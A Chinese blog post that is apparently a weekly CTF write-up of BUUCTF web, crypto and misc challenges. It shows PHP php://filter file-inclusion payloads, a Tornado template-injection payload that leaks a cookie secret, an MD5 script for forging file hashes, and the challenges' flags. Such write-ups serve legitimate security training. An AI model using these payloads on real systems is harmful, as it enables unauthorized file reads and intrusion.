每周刷题(三)

最新推荐文章于 2023-04-04 23:40:22 发布
最新推荐文章于 2023-04-04 23:40:22 发布
阅读量555 收藏
点赞数
分类专栏: 刷题
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45869039/article/details/108907672
版权

目录

web 1 [极客大挑战 2019]Havefun

在这里插入图片描述
打开是一个猫,什么也没有,然后F12查看源码

<!--
        $cat=$_GET['cat'];
        echo $cat;
        if($cat=='dog'){
            echo 'Syc{cat_cat_cat_cat}';
        }
        -->

在不起眼的地方得到了这个,如果输入的为dog,即?cat=dog,那么就能得到flag

web 2 [极客大挑战 2019]Secret File

在这里插入图片描述
emmm,查看页面源代码,你会发现.Archive_room.php

然后跳转到
在这里插入图片描述
那我们再次查看源代码,会发现./action.php,点击一下,跳转到end.php,这就让我很懵逼,但根据后面页面的提示就知道action.php,停留时间极短,然后直接跳转到end.php

那我们就试一下抓包

得到

<!DOCTYPE html>

<html>
<!--
   secr3t.php        
-->
</html>

我们访问secr3t.php

得到


<?php
    highlight_file(__FILE__);
    error_reporting(0);
    $file=$_GET['file'];
    if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
        echo "Oh no!";
        exit();
    }
    include($file); 
//flag放在了flag.php里
?>

应该有文件包含漏洞

看到了flag.php去访问量一下
在这里插入图片描述
emmmm,看了一下源代码没有什么东西
还是看那串代码吧

<?php
    highlight_file(__FILE__);
    error_reporting(0);
    $file=$_GET['file'];
    if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
        echo "Oh no!";
        exit();
    }
    include($file); 
//flag放在了flag.php里
?>

我们要绕过那几个敏感词,但是file没有过滤filter
我们可以用php://filter来获取flag。

然后我们就可以构造payload:secr3t.php?file=php://filter/convert.base64-encode/resource=flag.php

然后得到一串base64加密的字符

PCFET0NUWVBFIGh0bWw+Cgo8aHRtbD4KCiAgICA8aGVhZD4KICAgICAgICA8bWV0YSBjaGFyc2V0PSJ1dGYtOCI+CiAgICAgICAgPHRpdGxlPkZMQUc8L3RpdGxlPgogICAgPC9oZWFkPgoKICAgIDxib2R5IHN0eWxlPSJiYWNrZ3JvdW5kLWNvbG9yOmJsYWNrOyI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+CiAgICAgICAgCiAgICAgICAgPGgxIHN0eWxlPSJmb250LWZhbWlseTp2ZXJkYW5hO2NvbG9yOnJlZDt0ZXh0LWFsaWduOmNlbnRlcjsiPuWViuWTiO+8geS9oOaJvuWIsOaIkeS6hu+8geWPr+aYr+S9oOeci+S4jeWIsOaIkVFBUX5+fjwvaDE+PGJyPjxicj48YnI+CiAgICAgICAgCiAgICAgICAgPHAgc3R5bGU9ImZvbnQtZmFtaWx5OmFyaWFsO2NvbG9yOnJlZDtmb250LXNpemU6MjBweDt0ZXh0LWFsaWduOmNlbnRlcjsiPgogICAgICAgICAgICA8P3BocAogICAgICAgICAgICAgICAgZWNobyAi5oiR5bCx5Zyo6L+Z6YeMIjsKICAgICAgICAgICAgICAgICRmbGFnID0gJ2ZsYWd7YjFhMzgyYmQtMTE5NS00Mjk4LTlhYzctMzIzNzlhOTNmNTJlfSc7CiAgICAgICAgICAgICAgICAkc2VjcmV0ID0gJ2ppQW5nX0x1eXVhbl93NG50c19hX2cxcklmcmkzbmQnCiAgICAgICAgICAgID8+CiAgICAgICAgPC9wPgogICAgPC9ib2R5PgoKPC9odG1sPgo=

解密一下得到flag

web 3 [护网杯 2018]easy_tornado

有三个txt文件

在这里插入图片描述
根据题目的tornado,意思就是一个用Python语言写成的Web服务器兼Web应用框架。
/flag.txt里是

/flag.txt
flag in /fllllllllllllag

/welcome.txt里是

/welcome.txt
render

/hints.txt里是

/hints.txt
md5(cookie_secret+md5(filename))

看url:http://bba92278-0b8e-488d-9597-a10f2c32bb82.node3.buuoj.cn/file?filename=/flag.txt&filehash=17d621fb10cd85c171cba6d7dafc3044

访问一个文件我们需要有两个条件filename和filehash

将fllllllllllllag替换掉filename

得到报错
在这里插入图片描述
看url:http://bba92278-0b8e-488d-9597-a10f2c32bb82.node3.buuoj.cn/error?msg=Error
Error可以被替换为任何字符

?msg=123
在这里插入图片描述
到这我就不会了,看了大佬wp

知道了知道了这是个模板注入,并且/welcome.txt里的render是python的一个渲染函数。

报错时候的 url 是这样的

在 tornado 模板中,存在一些可以访问的快速对象



 <title>
     {{ escape(handler.settings["cookie"]) }}
 </title>

那么我们构造payload:http://bba92278-0b8e-488d-9597-a10f2c32bb82.node3.buuoj.cn/error?msg={{handler.settings}}

在这里插入图片描述
我们得到了文件名和cookie

我们对其加密得到了cc85887d4387a3df37a470ab517184d2

我这种加密方式比较麻烦

直接上脚本



import hashlib
def md5value(s):
    md5 = hashlib.md5() 
    md5.update(s) 
    return md5.hexdigest()
def jiami(): 
    filename = ‘/fllllllllllllag‘
    cookie_s ="5c68d92e-9f4d-42a4-8960-a98b331de3c1"
    print(md5value(filename.encode(‘utf-8‘)))
    x=md5value(filename.encode(‘utf-8‘))
    y=cookie_s+xprint(md5value(y.encode(‘utf-8‘)))
jiami()

记得cookie要换成自己的

然后构造payload:http://bba92278-0b8e-488d-9597-a10f2c32bb82.node3.buuoj.cn/file?filename=/fllllllllllllag&filehash=cc85887d4387a3df37a470ab517184d2

得到flag

web 4 [ACTF2020 新生赛]Include

在这里插入图片描述
这种题要不就是查看源码,要不就是文件包含。

url:http://81225635-3118-452e-bd92-27cfaee9ec23.node3.buuoj.cn/?file=flag.php

我们也就可以构造payload:?file=php://filter/read=convert.base64-encode/resource=flag.php

得到:PD9waHAKZWNobyAiQ2FuIHlvdSBmaW5kIG91dCB0aGUgZmxhZz8iOwovL2ZsYWd7MDdhNjI1ZTMtZGFlNC00ZTZlLWI0ZjMtNjZmMmZkNWUzZDlhfQo=

再base64解密,得到flag

Crypto 1 [BJDCTF 2nd]灵能精通-y1ng

得到一个没有后缀的文件,通过分析得到它是jfif文件

打开

在这里插入图片描述
在这里插入图片描述

这是啥?

我懵逼了

看大佬wp,知道了这是猪圈加密的变形圣堂武士密码(第一次碰见,无知是多么可怕啊)

在这里插入图片描述
对照表,得到flag{IMKNIGHTSTEMPLAR}

Cypto 2 权限获得第一步

附件里是:Administrator:500:806EDC27AA52E314AAD3B435B51404EE:F4AD50F57683D4260DFD48AA351A17A8:::

对806EDC27AA52E314AAD3B435B51404EE和F4AD50F57683D4260DFD48AA351A17A8解密,但是第一个没有解密出来,第二个是3617656,提交就是flag。

太突然了。

Cypto 3 萌萌哒猪八戒

在这里插入图片描述
猪?

猪圈密码?

附上我收藏的网站猪圈密码解密

得到flag{whenthepigwanttoeat}

Cypto 4 [BJDCTF 2nd]Y1nglish-y1ng

打开附件

在这里插入图片描述
最后一行很熟悉,这就让我想到了替换密码,但是不知道替换的值是什么😅😅😅

看了大师傅wp,是BJD 出的题,所以MIH=BJD

恕我做题太少,没想到

暴力破解网站直接破解,取第一个解密值:BJD{pyth0n_Brut3_f0rc3_oR_quipquip_AI_Cr4cy}

但是还需要改某个单词,就是将Cr4cy改成Cr4ck是Crack吗?

Misc 1 被嗅探的流量

是流量分析题
在HTTP里找到,文件上传的信息
在这里插入图片描述
双击看具体信息
在这里插入图片描述
看到了flag{da73d88936010da1eeeb36e945ec4b97}

Misc 2 小明的保密箱

在这里插入图片描述
知道图片里有个有密码的压缩包,我用foremost分离出来。

当然也可以直接修改后缀为zip

也可以用winhex分离出来

如何知道是四位纯数字,直接爆破。

得到flag{75a3d68bf071ee188c418ea6cf0bb043}

Crypto 3 爱因斯坦

又是一张图片

在这里插入图片描述
winhex看了一下

在这里插入图片描述

flag.txt

又分离得到加密的文件,密码是啥?

别忘了看图片属性里隐藏的信息。

里面给出了密码。

Cypto 4 easycap

流量分析题
在这里插入图片描述
追踪tcp流即可得到flag!!!

小小奇点呀!
关注
专栏目录
攻防世界之easytornado 附带脚本
my_name_is_sy的博客
05-23 211
easytornado 打开后显示在flag中,我们可以看到提示 /flag.txt flag in /fllllllllllllag 然后,按照提示进入页面 那么,此处暂且搁置。打开“welcome.txt”页面。 得到提示 /welcome.txt render render 然后我们再打开提示页面“hints.txt” ...
OI每周刷题记录——lrllrl
翻过这座山,他们就会听到你的故事
09-16 1750
看这标题就知道我是模仿的hzwer大佬,远程%%% 大佬的OI经历让蒟蒻我深受感触,为了晚一些AFO本蒟蒻也得加油了 从高二上期第一周开始计数,每个星期天更一次,一直更到我AFO 2018.9.2~2018.9.8 线段树: CH4301 线段树 poj2482(同洛谷P1502) 线段树+离散化+扫描线 CH4302 线段树+最大公约数+树状数组+构造 poj2481 线...
CTF-Pwn-[BJDCTF 2nd]secret
归子莫的博客
05-06 1502
CTF-Pwn-[BJDCTF 2nd]secret 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges 题目 Pwn类,[BJDCTF 2nd]secret 下载题目文件 secret 思路 老规矩使用file...
CTF-杂项与密码学总结
热门推荐
xcsxchen
08-15 1万+
杂项 01文件操作与隐写 文件类型识别 1.File命令 当文件没有后缀名或者有后缀名而无法正常打开时,根据识别出的文件类型来修改后缀名即可正常打开文件。 使用场景:不知道后缀名,无法打开文件。格式: file myheart 2.winhex 通过winhex.程序中可以查看文件头类型,根据文件头类型判断出文件类型 使用场景: windows 下通过文件头信息判断文件类型 3.文件头残缺/错误 通常文件无法正常打开有两种情况,一种是文件头部残缺, 另一种是文件头部字段错误。针对文件头部残缺的情况,使用
记录BUUCTF的五道题 Secret File,Exec,LoveSQL,Ping Ping Ping,Knife
trytowritecode的博客
11-02 358
先从简单的题目开始讲起 Knife 打开靶机好的看到 eval($_POST["Syc"]); 两种解法一种菜刀,蚁剑直接连,另一种利用漏洞的本质无需工具。 因为这个利用的是远程代码执行的漏洞所以可以直接修改POST的提交参数来利用漏洞。废话不多上解法,我这边用的是蚁剑好的直接连接 根目录下有个flag文件直接点开 解法2 利用漏洞不知道为什么我的火狐的hackbar的插件不允许我提交post的数据,所以我post的提交都是用burpsuite去完成的 直接抓包提交方式改为POST的提交根据提示添加Sy
[极客大挑战 2019]Havefun
m0sway的博客
02-16 77
BUU Web题目 [极客大挑战 2019]Havefun WriteUp
程序员面试刷题的书哪个好-ui-guides:每周至少阅读一篇
07-07
程序员面试刷题的书哪个好用户界面指南 CSS - 认为你了解 CSS? - 一组很棒的设计系统。 - 一些对程序员有用的网站。 - 了解如何为您的 Web 项目添加动画 - 编写合理、可管理、可扩展的 CSS 的高级建议和指南。 - 一...
程序员考试刷题-SESE:自己
07-07
程序员考试刷题软件工程专业英语(SESE) 北京交通大学软件学院学生课程。 课程结构 课程分为8个单元,对应8天的课程。 对于每个单元,有 4 个部分: 阅读理解 提前提供了软件领域的文章。 在课堂上,讲师会讲解文章...
程序员考试刷题-Spring-2016:2016年Spring
07-07
每周下午 5-6 点(讲座前一小时) 课程说明 Java 编程语言简介。 有关涵盖的主题,请参阅。 这不是对编程、数据结构、算法或其他计算机科学主题的介绍。 在参加本课程之前,预计学生至少具有一种编程语言的经验。 ...
程序员社招刷题-Weekly-Problems-2016-2017:KU编程俱乐部2016-2017学年每周编程问题及其解决方案
07-01
程序员社招刷题 KU编程俱乐部2016-2017 前言 如果您在开始使用 Github 时遇到任何问题,或者有其他问题,Shaina 和我(Blaine)将在 Slack 频道中提问。 直接消息或通过#Programming-Club 频道联系我们。 如果有足够...
ctf-writeup-crawler:CTF撰写的检索器
04-27
ctf-writeup-crawler CTF撰写的检索器 请确保已在配置了以下内容的计算机上安装并运行PostgreSQL 确保有一个名为ctfcrawler的数据库 确保有一个postgres用户/密码:ctfcrawler / ctfcrawler 该程序是在Eclipse IDE上开发的。 要运行,可以将文件夹导入Eclipse并使用Eclipse运行,或者使用“ jar xf”提取jar文件并使用“ java”运行 WebCrawlerDriver 用于启动WebCrawler的驱动程序类。 要运行,“ java WebCrawlerDriver” 数据库前端 用于查询的数据库前端。 要运行,“ java DatabseFrontend” WhiteList_Domains.txt 包含爬网期间允许的域 Categories.txt 包含在爬网期间标记链接的类别 Po
buu刷题1.2
ooooohhhhhhh博客
10-28 120
1.2.1[极客大挑战 2019]EasySQL 随便输入一个账号和密码,显示如下界面 判断一下是否存在sql注入 出现报错,说明存在SQL注入漏洞 构造一个url,让无论账号和密码输入正确或者错误都为真,能够登录成功 http://f7c0ad9c-3f3f-443b-a0ef-6faf2b97c32c.node3.buuoj.cn/check.php?username=admin'or'1'='1&password=admin'or'1'='1 1.2.2[极客大
漏洞复现-easy_tornado
qq_59350385的博客
07-04 310
windowsFirefoxtornado是python中的一个web应用框架。拿到题目发现有个文件:flag.txt 发现flag在/fllllllllllllag文件里;welcome.txt render是python中的一个渲染函数,渲染变量到模板中,即可以通过传递不同的参数形成不同的页面。hints.txt filehash=md5(cookie_secret+md5(filename)) 现在filename=/fllllllllllllag,只需要知道cookie_secret的
Buuctf-WEB简单的3套题
yuanxu8877的博客
04-04 328
Bugkuctf-WEB简单的3套题,涉及命令执行,文件包含
CTF】-Web练习日志8.11
pyhsaihz的博客
08-12 358
ctf练习
第一道题的flag
splayring的博客
10-05 806
题目:计算:在0!, 1!, 2!, 3!, ..., (n-1)!, n!这些数中,有多少个数末尾有偶数个0。 Input 输入文件包含多组测试数据,并以“-1”结束。 每组数据只有一行,包含一个正整数n。 Output 对于每个测试数据,输出一行表示答案。 就这样, 我的错误代码: #include ty
BJDCTF 2nd总结
rreally的博客
03-26 1429
crypto 签到-y1ng 这道题基本上是最常见的体系base64直接解得BJD{W3lc0me_T0_BJDCTF} 老文盲了 这题挺奇葩的,打开发现内容为“罼雧締眔擴灝淛匶襫黼瀬鎶軄鶛驕鳓哵眔鞹鰝”前个首写为BJD,后面读出来是“大括号这就是flag直接交了吧大括号”,所以提交BJD{淛匶襫黼瀬鎶軄鶛驕鳓哵}。 cat_flag 这题出的属于知识盲区,完全没有头绪,直到看讲解时得知可以“喵...
CTF WriteUp】2020全国工业互联网安全技术技能大赛(原护网杯)Crypto题解
cccchhhh6819的博客
10-25 6984
Crypto signsystem 题目中的加密算法很奇怪,所以测试一下加密算法的结果,得到如下结论: 在不模n的情况下,该函数加密结果满足以下数列: f(1) = m, f(2) = m^2-2, f(n+2) = m*f(n+1) - f(n) 列出几项观察: m, m^2-2, m^3-3m, m^4-4m^2+2, m^5-5m^3+5m, ... 暂时没有得到有用结论。再看一看e和d的关系,随便找了100个输入,确认e和d在该算法可逆,原理不明。 继续看代码。代码允许输入一个明文m计算enc(
[NPUCTF2020]共 模 攻 击(sage解方程)
weixin_44110537的博客
08-06 2277
encrypt hint: from gmpy2 import * from Crypto.Util.number import * from secret import hint m = bytes_to_long(hint) p = getPrime(256) c = pow(m, 256, p) print(p) p, q = getPrime(256), getPrime(256) n = p * q e1, e2 = getPrime(32), getPrime(32) c1, c2 = po
leecode刷题手册
最新发布
07-15
9. 刷题计划:可以制定一个刷题计划,每天或每周刷一定数量的题目,并坚持下去。 10. 总结和复习:在刷题过程中,及时总结自己的思考和解题过程,对于一些常见的算法和技巧进行复习和加深理解。 希望以上的建议对...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值